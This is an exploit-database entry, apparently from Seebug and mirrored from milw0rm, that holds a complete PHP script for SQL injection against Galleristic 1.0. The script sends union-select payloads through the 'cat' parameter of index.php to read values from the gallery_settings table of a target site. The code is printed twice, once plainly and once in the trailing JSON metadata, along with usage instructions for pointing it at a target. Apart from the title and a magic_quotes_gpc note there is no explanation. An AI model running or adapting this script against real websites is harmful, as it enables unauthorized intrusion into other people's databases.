ID SSV:17228
Type seebug
Reporter Root
Modified 2008-05-07T00:00:00
Description
No description provided by source.
<?php
#
# Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
# Author : cOndemned
# Note : works only when magic_quotes_gpc = off
# Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#
function exploit($target, $v) {
$injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
$request = file($target . $injection);
for($i = 0; $i < count($request); $i++) {
preg_match('/\'(.*)\'<\/h2>/', $request[$i], $response);
if(!empty($response[1])) {
return $response[1] . '<br />';
}
}
}
# Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
if(empty($_GET['target'])) {
die('No target site specified!');
}
else {
for($c = 1; $c < 3; $c++) {
echo exploit($_GET['target'], $c);
}
}
?>
# milw0rm.com [2008-05-07]
{"sourceData": "\n <?php\n\n#\n# Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit\n# Author : cOndemned\n# Note : works only when magic_quotes_gpc = off\n# Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*\n#\n\nfunction exploit($target, $v) {\n\n $injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";\n $request = file($target . $injection);\n \n for($i = 0; $i < count($request); $i++) {\n \n preg_match('/\\'(.*)\\'<\\/h2>/', $request[$i], $response);\n \n if(!empty($response[1])) {\n return $response[1] . '<br />';\n }\n }\n}\n\n# Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/\nif(empty($_GET['target'])) {\n die('No target site specified!');\n}\nelse {\n for($c = 1; $c < 3; $c++) {\n echo exploit($_GET['target'], $c);\n } \n}\n\n?>\n\n# milw0rm.com [2008-05-07]\n\n ", "status": "poc", "history": [], "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-17228", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-17228", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 0, "references": [], "lastseen": "2017-11-19T21:42:39", "published": "2008-05-07T00:00:00", "objectVersion": "1.4", "cvelist": [], "id": "SSV:17228", "enchantments_done": [], "modified": "2008-05-07T00:00:00", "title": "Galleristic 1.0 (index.php cat) Remote SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2017-11-19T21:42:39"}, "vulnersScore": 7.5}, "_object_type": "robots.models.seebug.SeebugBulletin"}
{}